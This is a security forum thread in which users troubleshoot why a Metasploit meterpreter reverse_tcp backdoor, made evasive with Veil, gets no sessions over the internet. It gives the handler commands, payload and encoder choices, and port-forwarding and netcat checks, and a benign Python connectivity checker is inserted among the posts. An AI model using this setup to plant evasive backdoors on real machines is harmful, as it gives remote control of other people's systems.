Caps Posted August 30, 2015

Hello, I am new to this forum but I think you guys can help me. I am having trouble with Metasploit over the internet. I have a backdoor with lhost: external ip and lport: 4444. My listener is just multi/handler with lhost: local ip and lport: 4444. I port forwarded port 4444 on my router to my local ip. To make my backdoor I use Veil. Hope you can help me!!!
cooper Posted August 30, 2015

Well, all I can tell you is that, based on your screenshot, with this configuration in place, if something on the internet wants to connect to you on port 4444 that will now work. If you have a backdoor on a remote machine, you probably only need to connect to it as it's listening on a port for you - this whole port mapping thing shouldn't even be required. Unless, in the process of breaking into a remote host, you run shellcode on the remote host that results in it connecting back to you. That really is all I can tell you. To make it a car analogy, you're asking me if a close-up photograph of a chunk of asphalt is a part of the road between New York and Las Vegas. It could be, but without a bit more info it's impossible to tell.
Caps Posted August 30, 2015 (Author, edited)

Ok, I will try to give you as much info as I can. I run Kali Linux 2 on my laptop (ThinkPad Edge); it is not a VM. I am connected wirelessly to my router (bbox 3). Here are my commands for my terminal listener:

root@kali:~# msfconsole
[-] Failed to connect to the database: could not connect to server: Connection refused
Is the server running on host "localhost" (::1) and accepting TCP/IP connections on port 5432?
could not connect to server: Connection refused
Is the server running on host "localhost" (127.0.0.1) and accepting TCP/IP connections on port 5432?
[-] WARNING! The following modules could not be loaded!
[-] /usr/share/metasploit-framework/modules/exploits/windows/25912.rb: SyntaxError /usr/share/metasploit-framework/modules/exploits/windows/25912.rb:30: syntax error, unexpected tCONSTANT, expecting end-of-input
// Windows NT/2K/XP/2K3/VISTA/2K8/7/8 EPATHOBJ local ring0 exploit
^

# cowsay++
 ____________
< metasploit >
 ------------
       \   ,__,
        \  (oo)____
           (__)    )\
              ||--|| *

Validate lots of vulnerabilities to demonstrate exposure with Metasploit Pro -- Learn more on http://rapid7.com/metasploit

       =[ metasploit v4.11.4-2015071403 ]
+ -- --=[ 1467 exploits - 840 auxiliary - 232 post ]
+ -- --=[ 432 payloads - 37 encoders - 8 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.44
lhost => 192.168.1.44
msf exploit(handler) > set lport 4444
lport => 4444
msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: , , seh, thread, process, none)
   LHOST     192.168.1.44     yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

msf exploit(handler) > exploit -j
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.1.44:4444
[*] Starting the payload handler...
msf exploit(handler) >

I use veil-evasion for my backdoor. The encoder I use: 35) python/shellcode_inject/base64_substitution. Shellcode is msfvenom, payload is windows/meterpreter/reverse_tcp, LHOST: my external ip, LPORT: 4444, no extra msfvenom options. That's my backdoor.

I also did some nmaps.

On my local ip:

root@kali:~# nmap 192.168.1.44 -p 4444
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-08-30 12:58 BST
Nmap scan report for kali (192.168.1.44)
Host is up (0.00013s latency).
PORT     STATE SERVICE
4444/tcp open  krb524
Nmap done: 1 IP address (1 host up) scanned in 0.33 seconds

On my router gateway:

root@kali:~# nmap 192.168.1.1 -p 4444
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-08-30 12:59 BST
Nmap scan report for mymodem (192.168.1.1)
Host is up (0.0032s latency).
PORT     STATE  SERVICE
4444/tcp closed krb524
MAC Address: 68:15:90:0C:2E:01 (Sagemcom SAS)
Nmap done: 1 IP address (1 host up) scanned in 0.64 seconds

And on my public ip:

root@kali:~# nmap public ip -p 4444
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-08-30 13:00 BST
Nmap scan report for x.x.x.x.belgacom.be (public ip)
Host is up (0.0065s latency).
PORT     STATE    SERVICE
4444/tcp filtered krb524
Nmap done: 1 IP address (1 host up) scanned in 0.62 seconds

Here is my ifconfig on wlan:

root@kali:~# ifconfig wlan0
wlan0     Link encap:Ethernet  HWaddr 74:e5:0b:0b:f6:a4
          inet addr:192.168.1.44  Bcast:192.168.1.255  Mask:255.255.255.0
          inet6 addr: 2a02:a03f:2c0a:e400:76e5:bff:fe0b:f6a4/64 Scope:Global
          inet6 addr: fe80::76e5:bff:fe0b:f6a4/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:617656 errors:0 dropped:0 overruns:0 frame:0
          TX packets:283680 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:546610500 (521.2 MiB)  TX bytes:43580129 (41.5 MiB)

I think I gave you all I can. It says that I can't post until tomorrow.

Edited August 30, 2015 by digininja: Removed potential public IP
cooper Posted August 30, 2015

I think the problem is with your lhost, which you're setting to your LAN IP. When the remote server wants to connect to you it will use that IP as a destination, which of course will make very little sense. You should specify your external IP (i.e. the outside IP of your router) and chances are things will work much better.
digininja Posted August 30, 2015

I'd say your port forwarding is broken somewhere. Kill the Metasploit stuff and start a basic listener on your machine with netcat, then see if you can connect to it from outside. If you can't, then the port forward is broken.
digininja Posted August 30, 2015

In reply to "Please help me, I am still here.":

If you want instant replies a forum isn't the best way to go; you might get it or it may take days for someone to reply. IRC is usually better if you can find a channel with someone skilled on it.
Caps Posted August 31, 2015 (Author)

So I think I got the port forward to work, but I can't get a session. Even when I try just a local backdoor with the lhost on the backdoor set to my local ip it will not work.
digininja Posted August 31, 2015

Have you checked all the stuff with netcat?
i8igmac Posted August 31, 2015

http://www.t1shopper.com/tools/port-scan/

If your exploit handler is running on port 4444, you should then scan this port from a remote host; the tool above will tell you if the port is responding...
digip Posted August 31, 2015

In reply to "So I think I got the port forward to work, but I can't get a session. Even when I try just a local backdoor with the lhost on the backdoor set to my local ip it will not work.":

And are there any sessions to be interacted with? Did the exploit run successfully? What do you see with: "sessions -l" (-L lowercase)
cooper Posted August 31, 2015

Yeah, basically the idea is that you test your exploit locally first, so that once you try it over the internet the only thing that can go wrong is the connection. You'll know beforehand what you need to debug in case of problems.
Caps Posted September 2, 2015 (Author)

There are no sessions when I try to connect, and when I do "jobs" there is a multi/handler job. I am trying to fix my problem so that I can use my backdoor over LAN; any ideas?
digininja Posted September 2, 2015

I'm going to ask this once more then leave: have you checked every step using netcat? Make sure that at each stage you can talk between the two machines. Start with nc doing both server and client, then move to Metasploit as the server and test again. That will show connectivity, as the results from your first posts suggest that it is that that is causing at least part of the problem.
Caps Posted September 2, 2015 (Author, edited)

So I did some nc. My listener is working: when I do a nc on my pc to my listener I get "sending stage". How do I test it from my Windows pc? I think that my pc blocks connections from outside.

EDIT: I installed netcat on my Windows machine; when I try to do it I don't get any connections.

Edited September 2, 2015 by Caps
digininja Posted September 2, 2015

When nc is running as a client it will be connecting out, so it doesn't matter about inbound connections. Start at the localhost and connect to 4444, then do it from something else on the network; if they work then try it from something outside the network. If any fail you know where the blockage is.
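The staged check digininja describes (localhost first, then another host on the LAN, then something outside), written up as an added Python example that is not from this thread, from Metasploit or from netcat; it uses a throwaway listener in place of "nc -l" and names the probe results the way nmap did in Caps' scans, so a "filtered" public IP next to an "open" LAN IP points straight at the router. The hosts and port are assumptions to be replaced with your own.

```python
import socket
import threading

def probe_tcp(host, port, timeout=3.0):
    """One TCP connect; returns 'open', 'closed' or 'filtered'.
    closed = reset/refused (nmap's state for the router's LAN side);
    filtered = no answer before timeout (nmap's state for the public IP,
    usually a firewall or a missing port-forward rule dropping packets)."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return "open"
    except ConnectionRefusedError:
        return "closed"
    except OSError:  # timeout, host unreachable, ...
        return "filtered"

def start_test_listener(host="127.0.0.1", port=0):
    """Stand-in for 'nc -l -p 4444': accept connections until closed.
    Returns the bound port (port=0 lets the OS pick a free one)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, port))
    srv.listen(5)
    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:  # listener closed
                return
            conn.close()
    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]

def free_port(host="127.0.0.1"):
    """A port with nothing listening, to see what 'closed' looks like."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind((host, 0))
    port = s.getsockname()[1]
    s.close()
    return port

def staged_check(stages, port, timeout=3.0):
    """stages: [(label, host)] in order localhost -> LAN IP -> public IP.
    Stops at the first stage that is not 'open'; that is where the
    blockage is. Returns (results, failed_label_or_None)."""
    results = []
    for label, host in stages:
        state = probe_tcp(host, port, timeout)
        results.append((label, state))
        if state != "open":
            return results, label
    return results, None
```

Run staged_check with stages such as [("localhost", "127.0.0.1"), ("LAN IP", "192.168.1.44"), ("public IP", "<your public IP>")] against port 4444 while the listener is up; the probe from "outside" has to be launched from a machine outside your network, since the router will not hairpin the connection for you.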
Caps Posted September 2, 2015 (Author)

Thanks for the help, it works now!
digininja Posted September 2, 2015

Always start with the basics and check connectivity before moving up the stack. Glad it's working.
Caps Posted September 3, 2015 (Author)

Nice, now it's working over LAN. I want to try it over the internet; still the same problem. For the configs of my backdoor and listener see above, it is still the same, but I will recap it:

Backdoor: lhost: my external ip, lport: 4444
Listener: lhost: my internal ip, lport: 4444

The port is open on my router, checked with an online checker.
i8igmac Posted September 3, 2015

Lhost on your exploit handler should be set to your local ip... your router should port forward this same port and local ip. When the exploit handler is running you should now see it with an online scanner. This is a TCP reverse shell?
digininja Posted September 3, 2015

The port may be open on the router, but is it correctly passing traffic to your listener? Back to basics: use netcat outside to connect to the listener and see if you get the connection.
Caps Posted September 4, 2015 (Author)

Yes, I use reverse TCP, and it works when I use an online scanner, so I have to check on my backdoor.
digininja Posted September 4, 2015

What are you using this backdoor for? Assuming it is for legitimate reasons, then you will have access to the target machine; try netcat from there. That will help prove whether it is the network or the exploit that is at fault.
hakkka Posted May 17, 2016

Hey guys.... Someone please help me, I am having a crisis and I'm very desperate. I am having exactly the same problem as Caps had and I tried to fix it but failed.... My Metasploit listener used to work previously and I got sessions, but since I tried to attack my other system over the WAN network, now I can't get a session on both LAN and WAN. I am on Kali 2.0 Sana; for WAN, I used No-IP DNS for a static public IP.

1. Created my backdoor. My payload is [ windows/meterpreter/reverse_tcp_dns ], LHOST is my [ hostname.ddns.net ], LPORT is [ 4444 ], and I did port forwarding and also confirmed that the port is working on canyouseeme.org.

2. Created a listener. I used the same payload [ windows/meterpreter/reverse_tcp_dns ], LHOST is my local ip address, and used the same port 4444.

Caps, IF YOU can read this please tell me how you resolved the problem.... Anyone, please provide me a SOLUTION.... I'll be glad, thx